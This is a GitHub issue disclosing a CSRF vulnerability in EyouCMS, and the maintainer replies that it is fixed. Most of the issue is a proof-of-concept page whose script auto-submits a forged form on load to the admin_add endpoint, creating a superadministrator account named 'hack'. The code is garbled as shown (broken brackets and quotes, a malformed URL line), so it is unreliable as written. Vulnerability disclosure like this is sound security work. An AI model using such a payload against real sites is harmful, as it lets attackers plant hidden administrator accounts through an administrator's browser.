### ISSUE TITLE
There is one CSRF vulnerability that can add the superadministrator account

### ISSUE THREAD

**Issue by 15551033330** [weng-xianhu/eyoucms#11]
add the superadministrator account

-html--body-
-script type="text/javascript"-
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "input type="hidden" name="user&#95;name" value="hack" ";
fields += "input type="hidden" name="password" value="hacktest" ;  
fields += "input type="hidden" name="password2" value="hacktest" ;  
fields += "input type="hidden" name="pen&#95;name" value="" ;  
fields += "input type="hidden" name="true&#95;name" value="" 
fields += "input type="hidden" name="mobile" value="" 
fields += "input type="hidden" name="role&#95;id" value="&#45;1" 
fields += "input type="submit" value="Submit request" 
var url = "http://172.0.0.1/www/login.php?m=admin&c=Admin&a=admin_add&lang=cn" method="POST">
post(url,fields);
}
window.onload = function() { csrf_hack();}
-/script-
-/body--/html-

**Comment by weng-xianhu** [comment]
已修复
